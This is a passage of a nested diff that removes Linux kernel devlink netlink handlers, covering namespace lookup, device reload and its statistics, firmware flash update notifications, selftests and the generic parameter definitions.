+-	list_for_each_entry(resource, resource_list, list) {
+-		if (!resource->size_valid)
+-			return -EINVAL;
+-		err = devlink_resources_validate(devlink, resource, info);
+-		if (err)
+-			return err;
+-	}
+-	return err;
+-}
+-
+-static struct net *devlink_netns_get(struct sk_buff *skb,
+-				     struct genl_info *info)
+-{
+-	struct nlattr *netns_pid_attr = info->attrs[DEVLINK_ATTR_NETNS_PID];
+-	struct nlattr *netns_fd_attr = info->attrs[DEVLINK_ATTR_NETNS_FD];
+-	struct nlattr *netns_id_attr = info->attrs[DEVLINK_ATTR_NETNS_ID];
+-	struct net *net;
+-
+-	if (!!netns_pid_attr + !!netns_fd_attr + !!netns_id_attr > 1) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "multiple netns identifying attributes specified");
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	if (netns_pid_attr) {
+-		net = get_net_ns_by_pid(nla_get_u32(netns_pid_attr));
+-	} else if (netns_fd_attr) {
+-		net = get_net_ns_by_fd(nla_get_u32(netns_fd_attr));
+-	} else if (netns_id_attr) {
+-		net = get_net_ns_by_id(sock_net(skb->sk),
+-				       nla_get_u32(netns_id_attr));
+-		if (!net)
+-			net = ERR_PTR(-EINVAL);
+-	} else {
+-		WARN_ON(1);
+-		net = ERR_PTR(-EINVAL);
+-	}
+-	if (IS_ERR(net)) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Unknown network namespace");
+-		return ERR_PTR(-EINVAL);
+-	}
+-	if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN)) {
+-		put_net(net);
+-		return ERR_PTR(-EPERM);
+-	}
+-	return net;
+-}
+-
+-static void devlink_param_notify(struct devlink *devlink,
+-				 unsigned int port_index,
+-				 struct devlink_param_item *param_item,
+-				 enum devlink_command cmd);
+-
+-static void devlink_ns_change_notify(struct devlink *devlink,
+-				     struct net *dest_net, struct net *curr_net,
+-				     bool new)
+-{
+-	struct devlink_param_item *param_item;
+-	enum devlink_command cmd;
+-
+-	/* Userspace needs to be notified about devlink objects
+-	 * removed from original and entering new network namespace.
+-	 * The rest of the devlink objects are re-created during
+-	 * reload process so the notifications are generated separatelly.
+-	 */
+-
+-	if (!dest_net || net_eq(dest_net, curr_net))
+-		return;
+-
+-	if (new)
+-		devlink_notify(devlink, DEVLINK_CMD_NEW);
+-
+-	cmd = new ? DEVLINK_CMD_PARAM_NEW : DEVLINK_CMD_PARAM_DEL;
+-	list_for_each_entry(param_item, &devlink->param_list, list)
+-		devlink_param_notify(devlink, 0, param_item, cmd);
+-
+-	if (!new)
+-		devlink_notify(devlink, DEVLINK_CMD_DEL);
+-}
+-
+-static bool devlink_reload_supported(const struct devlink_ops *ops)
+-{
+-	return ops->reload_down && ops->reload_up;
+-}
+-
+-static void devlink_reload_failed_set(struct devlink *devlink,
+-				      bool reload_failed)
+-{
+-	if (devlink->reload_failed == reload_failed)
+-		return;
+-	devlink->reload_failed = reload_failed;
+-	devlink_notify(devlink, DEVLINK_CMD_NEW);
+-}
+-
+-bool devlink_is_reload_failed(const struct devlink *devlink)
+-{
+-	return devlink->reload_failed;
+-}
+-EXPORT_SYMBOL_GPL(devlink_is_reload_failed);
+-
+-static void
+-__devlink_reload_stats_update(struct devlink *devlink, u32 *reload_stats,
+-			      enum devlink_reload_limit limit, u32 actions_performed)
+-{
+-	unsigned long actions = actions_performed;
+-	int stat_idx;
+-	int action;
+-
+-	for_each_set_bit(action, &actions, __DEVLINK_RELOAD_ACTION_MAX) {
+-		stat_idx = limit * __DEVLINK_RELOAD_ACTION_MAX + action;
+-		reload_stats[stat_idx]++;
+-	}
+-	devlink_notify(devlink, DEVLINK_CMD_NEW);
+-}
+-
+-static void
+-devlink_reload_stats_update(struct devlink *devlink, enum devlink_reload_limit limit,
+-			    u32 actions_performed)
+-{
+-	__devlink_reload_stats_update(devlink, devlink->stats.reload_stats, limit,
+-				      actions_performed);
+-}
+-
+-/**
+- *	devlink_remote_reload_actions_performed - Update devlink on reload actions
+- *	  performed which are not a direct result of devlink reload call.
+- *
+- *	This should be called by a driver after performing reload actions in case it was not
+- *	a result of devlink reload call. For example fw_activate was performed as a result
+- *	of devlink reload triggered fw_activate on another host.
+- *	The motivation for this function is to keep data on reload actions performed on this
+- *	function whether it was done due to direct devlink reload call or not.
+- *
+- *	@devlink: devlink
+- *	@limit: reload limit
+- *	@actions_performed: bitmask of actions performed
+- */
+-void devlink_remote_reload_actions_performed(struct devlink *devlink,
+-					     enum devlink_reload_limit limit,
+-					     u32 actions_performed)
+-{
+-	if (WARN_ON(!actions_performed ||
+-		    actions_performed & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
+-		    actions_performed >= BIT(__DEVLINK_RELOAD_ACTION_MAX) ||
+-		    limit > DEVLINK_RELOAD_LIMIT_MAX))
+-		return;
+-
+-	__devlink_reload_stats_update(devlink, devlink->stats.remote_reload_stats, limit,
+-				      actions_performed);
+-}
+-EXPORT_SYMBOL_GPL(devlink_remote_reload_actions_performed);
+-
+-static int devlink_reload(struct devlink *devlink, struct net *dest_net,
+-			  enum devlink_reload_action action, enum devlink_reload_limit limit,
+-			  u32 *actions_performed, struct netlink_ext_ack *extack)
+-{
+-	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
+-	struct net *curr_net;
+-	int err;
+-
+-	memcpy(remote_reload_stats, devlink->stats.remote_reload_stats,
+-	       sizeof(remote_reload_stats));
+-
+-	curr_net = devlink_net(devlink);
+-	devlink_ns_change_notify(devlink, dest_net, curr_net, false);
+-	err = devlink->ops->reload_down(devlink, !!dest_net, action, limit, extack);
+-	if (err)
+-		return err;
+-
+-	if (dest_net && !net_eq(dest_net, curr_net))
+-		write_pnet(&devlink->_net, dest_net);
+-
+-	err = devlink->ops->reload_up(devlink, action, limit, actions_performed, extack);
+-	devlink_reload_failed_set(devlink, !!err);
+-	if (err)
+-		return err;
+-
+-	devlink_ns_change_notify(devlink, dest_net, curr_net, true);
+-	WARN_ON(!(*actions_performed & BIT(action)));
+-	/* Catch driver on updating the remote action within devlink reload */
+-	WARN_ON(memcmp(remote_reload_stats, devlink->stats.remote_reload_stats,
+-		       sizeof(remote_reload_stats)));
+-	devlink_reload_stats_update(devlink, limit, *actions_performed);
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_reload_actions_performed_snd(struct devlink *devlink, u32 actions_performed,
+-					enum devlink_command cmd, struct genl_info *info)
+-{
+-	struct sk_buff *msg;
+-	void *hdr;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq, &devlink_nl_family, 0, cmd);
+-	if (!hdr)
+-		goto free_msg;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_bitfield32(msg, DEVLINK_ATTR_RELOAD_ACTIONS_PERFORMED, actions_performed,
+-			       actions_performed))
+-		goto nla_put_failure;
+-	genlmsg_end(msg, hdr);
+-
+-	return genlmsg_reply(msg, info);
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-free_msg:
+-	nlmsg_free(msg);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_reload(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	enum devlink_reload_action action;
+-	enum devlink_reload_limit limit;
+-	struct net *dest_net = NULL;
+-	u32 actions_performed;
+-	int err;
+-
+-	if (!(devlink->features & DEVLINK_F_RELOAD))
+-		return -EOPNOTSUPP;
+-
+-	err = devlink_resources_validate(devlink, NULL, info);
+-	if (err) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "resources size validation failed");
+-		return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_RELOAD_ACTION])
+-		action = nla_get_u8(info->attrs[DEVLINK_ATTR_RELOAD_ACTION]);
+-	else
+-		action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT;
+-
+-	if (!devlink_reload_action_is_supported(devlink, action)) {
+-		NL_SET_ERR_MSG_MOD(info->extack,
+-				   "Requested reload action is not supported by the driver");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	limit = DEVLINK_RELOAD_LIMIT_UNSPEC;
+-	if (info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]) {
+-		struct nla_bitfield32 limits;
+-		u32 limits_selected;
+-
+-		limits = nla_get_bitfield32(info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]);
+-		limits_selected = limits.value & limits.selector;
+-		if (!limits_selected) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Invalid limit selected");
+-			return -EINVAL;
+-		}
+-		for (limit = 0 ; limit <= DEVLINK_RELOAD_LIMIT_MAX ; limit++)
+-			if (limits_selected & BIT(limit))
+-				break;
+-		/* UAPI enables multiselection, but currently it is not used */
+-		if (limits_selected != BIT(limit)) {
+-			NL_SET_ERR_MSG_MOD(info->extack,
+-					   "Multiselection of limit is not supported");
+-			return -EOPNOTSUPP;
+-		}
+-		if (!devlink_reload_limit_is_supported(devlink, limit)) {
+-			NL_SET_ERR_MSG_MOD(info->extack,
+-					   "Requested limit is not supported by the driver");
+-			return -EOPNOTSUPP;
+-		}
+-		if (devlink_reload_combination_is_invalid(action, limit)) {
+-			NL_SET_ERR_MSG_MOD(info->extack,
+-					   "Requested limit is invalid for this action");
+-			return -EINVAL;
+-		}
+-	}
+-	if (info->attrs[DEVLINK_ATTR_NETNS_PID] ||
+-	    info->attrs[DEVLINK_ATTR_NETNS_FD] ||
+-	    info->attrs[DEVLINK_ATTR_NETNS_ID]) {
+-		dest_net = devlink_netns_get(skb, info);
+-		if (IS_ERR(dest_net))
+-			return PTR_ERR(dest_net);
+-	}
+-
+-	err = devlink_reload(devlink, dest_net, action, limit, &actions_performed, info->extack);
+-
+-	if (dest_net)
+-		put_net(dest_net);
+-
+-	if (err)
+-		return err;
+-	/* For backward compatibility generate reply only if attributes used by user */
+-	if (!info->attrs[DEVLINK_ATTR_RELOAD_ACTION] && !info->attrs[DEVLINK_ATTR_RELOAD_LIMITS])
+-		return 0;
+-
+-	return devlink_nl_reload_actions_performed_snd(devlink, actions_performed,
+-						       DEVLINK_CMD_RELOAD, info);
+-}
+-
+-static int devlink_nl_flash_update_fill(struct sk_buff *msg,
+-					struct devlink *devlink,
+-					enum devlink_command cmd,
+-					struct devlink_flash_notify *params)
+-{
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, 0, 0, &devlink_nl_family, 0, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS)
+-		goto out;
+-
+-	if (params->status_msg &&
+-	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_MSG,
+-			   params->status_msg))
+-		goto nla_put_failure;
+-	if (params->component &&
+-	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_COMPONENT,
+-			   params->component))
+-		goto nla_put_failure;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_DONE,
+-			      params->done, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TOTAL,
+-			      params->total, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TIMEOUT,
+-			      params->timeout, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-out:
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void __devlink_flash_update_notify(struct devlink *devlink,
+-					  enum devlink_command cmd,
+-					  struct devlink_flash_notify *params)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_FLASH_UPDATE &&
+-		cmd != DEVLINK_CMD_FLASH_UPDATE_END &&
+-		cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_flash_update_fill(msg, devlink, cmd, params);
+-	if (err)
+-		goto out_free_msg;
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-	return;
+-
+-out_free_msg:
+-	nlmsg_free(msg);
+-}
+-
+-static void devlink_flash_update_begin_notify(struct devlink *devlink)
+-{
+-	struct devlink_flash_notify params = {};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE,
+-				      &params);
+-}
+-
+-static void devlink_flash_update_end_notify(struct devlink *devlink)
+-{
+-	struct devlink_flash_notify params = {};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE_END,
+-				      &params);
+-}
+-
+-void devlink_flash_update_status_notify(struct devlink *devlink,
+-					const char *status_msg,
+-					const char *component,
+-					unsigned long done,
+-					unsigned long total)
+-{
+-	struct devlink_flash_notify params = {
+-		.status_msg = status_msg,
+-		.component = component,
+-		.done = done,
+-		.total = total,
+-	};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
+-				      &params);
+-}
+-EXPORT_SYMBOL_GPL(devlink_flash_update_status_notify);
+-
+-void devlink_flash_update_timeout_notify(struct devlink *devlink,
+-					 const char *status_msg,
+-					 const char *component,
+-					 unsigned long timeout)
+-{
+-	struct devlink_flash_notify params = {
+-		.status_msg = status_msg,
+-		.component = component,
+-		.timeout = timeout,
+-	};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
+-				      &params);
+-}
+-EXPORT_SYMBOL_GPL(devlink_flash_update_timeout_notify);
+-
+-struct devlink_info_req {
+-	struct sk_buff *msg;
+-	void (*version_cb)(const char *version_name,
+-			   enum devlink_info_version_type version_type,
+-			   void *version_cb_priv);
+-	void *version_cb_priv;
+-};
+-
+-struct devlink_flash_component_lookup_ctx {
+-	const char *lookup_name;
+-	bool lookup_name_found;
+-};
+-
+-static void
+-devlink_flash_component_lookup_cb(const char *version_name,
+-				  enum devlink_info_version_type version_type,
+-				  void *version_cb_priv)
+-{
+-	struct devlink_flash_component_lookup_ctx *lookup_ctx = version_cb_priv;
+-
+-	if (version_type != DEVLINK_INFO_VERSION_TYPE_COMPONENT ||
+-	    lookup_ctx->lookup_name_found)
+-		return;
+-
+-	lookup_ctx->lookup_name_found =
+-		!strcmp(lookup_ctx->lookup_name, version_name);
+-}
+-
+-static int devlink_flash_component_get(struct devlink *devlink,
+-				       struct nlattr *nla_component,
+-				       const char **p_component,
+-				       struct netlink_ext_ack *extack)
+-{
+-	struct devlink_flash_component_lookup_ctx lookup_ctx = {};
+-	struct devlink_info_req req = {};
+-	const char *component;
+-	int ret;
+-
+-	if (!nla_component)
+-		return 0;
+-
+-	component = nla_data(nla_component);
+-
+-	if (!devlink->ops->info_get) {
+-		NL_SET_ERR_MSG_ATTR(extack, nla_component,
+-				    "component update is not supported by this device");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	lookup_ctx.lookup_name = component;
+-	req.version_cb = devlink_flash_component_lookup_cb;
+-	req.version_cb_priv = &lookup_ctx;
+-
+-	ret = devlink->ops->info_get(devlink, &req, NULL);
+-	if (ret)
+-		return ret;
+-
+-	if (!lookup_ctx.lookup_name_found) {
+-		NL_SET_ERR_MSG_ATTR(extack, nla_component,
+-				    "selected component is not supported by this device");
+-		return -EINVAL;
+-	}
+-	*p_component = component;
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_flash_update(struct sk_buff *skb,
+-				       struct genl_info *info)
+-{
+-	struct nlattr *nla_overwrite_mask, *nla_file_name;
+-	struct devlink_flash_update_params params = {};
+-	struct devlink *devlink = info->user_ptr[0];
+-	const char *file_name;
+-	u32 supported_params;
+-	int ret;
+-
+-	if (!devlink->ops->flash_update)
+-		return -EOPNOTSUPP;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME))
+-		return -EINVAL;
+-
+-	ret = devlink_flash_component_get(devlink,
+-					  info->attrs[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT],
+-					  &params.component, info->extack);
+-	if (ret)
+-		return ret;
+-
+-	supported_params = devlink->ops->supported_flash_update_params;
+-
+-	nla_overwrite_mask = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK];
+-	if (nla_overwrite_mask) {
+-		struct nla_bitfield32 sections;
+-
+-		if (!(supported_params & DEVLINK_SUPPORT_FLASH_UPDATE_OVERWRITE_MASK)) {
+-			NL_SET_ERR_MSG_ATTR(info->extack, nla_overwrite_mask,
+-					    "overwrite settings are not supported by this device");
+-			return -EOPNOTSUPP;
+-		}
+-		sections = nla_get_bitfield32(nla_overwrite_mask);
+-		params.overwrite_mask = sections.value & sections.selector;
+-	}
+-
+-	nla_file_name = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME];
+-	file_name = nla_data(nla_file_name);
+-	ret = request_firmware(&params.fw, file_name, devlink->dev);
+-	if (ret) {
+-		NL_SET_ERR_MSG_ATTR(info->extack, nla_file_name, "failed to locate the requested firmware file");
+-		return ret;
+-	}
+-
+-	devlink_flash_update_begin_notify(devlink);
+-	ret = devlink->ops->flash_update(devlink, &params, info->extack);
+-	devlink_flash_update_end_notify(devlink);
+-
+-	release_firmware(params.fw);
+-
+-	return ret;
+-}
+-
+-static int
+-devlink_nl_selftests_fill(struct sk_buff *msg, struct devlink *devlink,
+-			  u32 portid, u32 seq, int flags,
+-			  struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *selftests;
+-	void *hdr;
+-	int err;
+-	int i;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags,
+-			  DEVLINK_CMD_SELFTESTS_GET);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = -EMSGSIZE;
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto err_cancel_msg;
+-
+-	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
+-	if (!selftests)
+-		goto err_cancel_msg;
+-
+-	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
+-	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
+-		if (devlink->ops->selftest_check(devlink, i, extack)) {
+-			err = nla_put_flag(msg, i);
+-			if (err)
+-				goto err_cancel_msg;
+-		}
+-	}
+-
+-	nla_nest_end(msg, selftests);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-err_cancel_msg:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_selftests_get_doit(struct sk_buff *skb,
+-					     struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (!devlink->ops->selftest_check)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_selftests_fill(msg, devlink, info->snd_portid,
+-					info->snd_seq, 0, info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_selftests_get_dumpit(struct sk_buff *msg,
+-					       struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (idx < start || !devlink->ops->selftest_check)
+-			goto inc;
+-
+-		devl_lock(devlink);
+-		err = devlink_nl_selftests_fill(msg, devlink,
+-						NETLINK_CB(cb->skb).portid,
+-						cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-						cb->extack);
+-		devl_unlock(devlink);
+-		if (err) {
+-			devlink_put(devlink);
+-			break;
+-		}
+-inc:
+-		idx++;
+-		devlink_put(devlink);
+-	}
+-
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_selftest_result_put(struct sk_buff *skb, unsigned int id,
+-				       enum devlink_selftest_status test_status)
+-{
+-	struct nlattr *result_attr;
+-
+-	result_attr = nla_nest_start(skb, DEVLINK_ATTR_SELFTEST_RESULT);
+-	if (!result_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u32(skb, DEVLINK_ATTR_SELFTEST_RESULT_ID, id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_SELFTEST_RESULT_STATUS,
+-		       test_status))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, result_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, result_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_selftests_run(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct nlattr *tb[DEVLINK_ATTR_SELFTEST_ID_MAX + 1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct nlattr *attrs, *selftests;
+-	struct sk_buff *msg;
+-	void *hdr;
+-	int err;
+-	int i;
+-
+-	if (!devlink->ops->selftest_run || !devlink->ops->selftest_check)
+-		return -EOPNOTSUPP;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SELFTESTS))
+-		return -EINVAL;
+-
+-	attrs = info->attrs[DEVLINK_ATTR_SELFTESTS];
+-
+-	err = nla_parse_nested(tb, DEVLINK_ATTR_SELFTEST_ID_MAX, attrs,
+-			       devlink_selftest_nl_policy, info->extack);
+-	if (err < 0)
+-		return err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = -EMSGSIZE;
+-	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, 0, DEVLINK_CMD_SELFTESTS_RUN);
+-	if (!hdr)
+-		goto free_msg;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto genlmsg_cancel;
+-
+-	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
+-	if (!selftests)
+-		goto genlmsg_cancel;
+-
+-	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
+-	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
+-		enum devlink_selftest_status test_status;
+-
+-		if (nla_get_flag(tb[i])) {
+-			if (!devlink->ops->selftest_check(devlink, i,
+-							  info->extack)) {
+-				if (devlink_selftest_result_put(msg, i,
+-								DEVLINK_SELFTEST_STATUS_SKIP))
+-					goto selftests_nest_cancel;
+-				continue;
+-			}
+-
+-			test_status = devlink->ops->selftest_run(devlink, i,
+-								 info->extack);
+-			if (devlink_selftest_result_put(msg, i, test_status))
+-				goto selftests_nest_cancel;
+-		}
+-	}
+-
+-	nla_nest_end(msg, selftests);
+-	genlmsg_end(msg, hdr);
+-	return genlmsg_reply(msg, info);
+-
+-selftests_nest_cancel:
+-	nla_nest_cancel(msg, selftests);
+-genlmsg_cancel:
+-	genlmsg_cancel(msg, hdr);
+-free_msg:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static const struct devlink_param devlink_param_generic[] = {
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_INT_ERR_RESET,
+-		.name = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_MAX_MACS,
+-		.name = DEVLINK_PARAM_GENERIC_MAX_MACS_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_MAX_MACS_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_SRIOV,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_REGION_SNAPSHOT,
+-		.name = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_IGNORE_ARI,
+-		.name = DEVLINK_PARAM_GENERIC_IGNORE_ARI_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_IGNORE_ARI_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MAX,
+-		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MIN,
+-		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_FW_LOAD_POLICY,
+-		.name = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_RESET_DEV_ON_DRV_PROBE,
+-		.name = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ROCE,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_REMOTE_DEV_RESET,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ETH,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_ETH_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_ETH_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_RDMA,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_VNET,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_VNET_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_VNET_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_IWARP,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_IO_EQ_SIZE,
+-		.name = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_EVENT_EQ_SIZE,
+-		.name = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_TYPE,
+-	},
+-};
+-
+-static int devlink_param_generic_verify(const struct devlink_param *param)
+-{
+-	/* verify it match generic parameter by id and name */
+-	if (param->id > DEVLINK_PARAM_GENERIC_ID_MAX)
+-		return -EINVAL;
+-	if (strcmp(param->name, devlink_param_generic[param->id].name))
+-		return -ENOENT;
+-
+-	WARN_ON(param->type != devlink_param_generic[param->id].type);
+-
+-	return 0;
+-}
+-
+-static int devlink_param_driver_verify(const struct devlink_param *param)
+-{
+-	int i;
+-
+-	if (param->id <= DEVLINK_PARAM_GENERIC_ID_MAX)
+-		return -EINVAL;
+-	/* verify no such name in generic params */
+-	for (i = 0; i <= DEVLINK_PARAM_GENERIC_ID_MAX; i++)
+-		if (!strcmp(param->name, devlink_param_generic[i].name))
+-			return -EEXIST;
+-
+-	return 0;
+-}
+-
+-static struct devlink_param_item *
+-devlink_param_find_by_name(struct list_head *param_list,
+-			   const char *param_name)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	list_for_each_entry(param_item, param_list, list)
+-		if (!strcmp(param_item->param->name, param_name))
+-			return param_item;
+-	return NULL;
+-}
+-
+-static struct devlink_param_item *
